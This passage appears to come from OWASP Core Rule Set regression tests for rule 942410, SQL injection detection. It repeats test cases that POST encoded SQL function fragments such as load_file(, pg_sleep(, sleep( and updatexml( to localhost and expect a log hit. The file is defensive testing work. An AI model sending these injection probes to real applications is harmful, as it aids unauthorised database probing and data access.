text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%21%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IFNULL%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=in+%27%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN%2F%2A%2A%2F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-45 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=insert%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-46 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=left%27%29%3F%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-47 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LEFT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-48 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-49 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-50 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-51 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%21%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-52 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-53 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LENGTH%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-54 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-55 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln%29+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-56 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=load_file%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-57 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=local%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-58 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-59 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-60 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=lower%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-61 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAKE_SET%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-62 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAX%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-63 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-64 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-65 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MID%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-66 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=minute+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-67 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=month%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-68 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "name_const(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-69 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "now(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-70 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "nOW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-71 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ord(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-72 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-73 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "password/?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-74 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Password>$(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-75 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pg_sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-76 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pi(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-77 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "PI(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-78 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pow(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-79 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "POW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-80 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "quarter. (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-81 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rand(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-82 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Rand (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-83 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RAND(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-84 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "replace(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-85 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "REPLACE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-86 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-87 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "round(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-88 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "rtrim(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-89 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RTRIM(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-90 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sin (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-91 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SIN(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-92 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-93 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SLEEP (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-94 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=strcmp(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-95 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-96 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-97 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=substring(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-98 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SUBSTRING(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-99 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sysdate(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-100 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "time (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-101 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=time%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-102 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=trim%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-103 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=Uncompress+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-104 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=unhex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-105 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=uNhEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-106 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=updatexml%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-107 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UpdateXML%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-108 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UPPER%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-109 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-110 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=user%2F%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-111 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 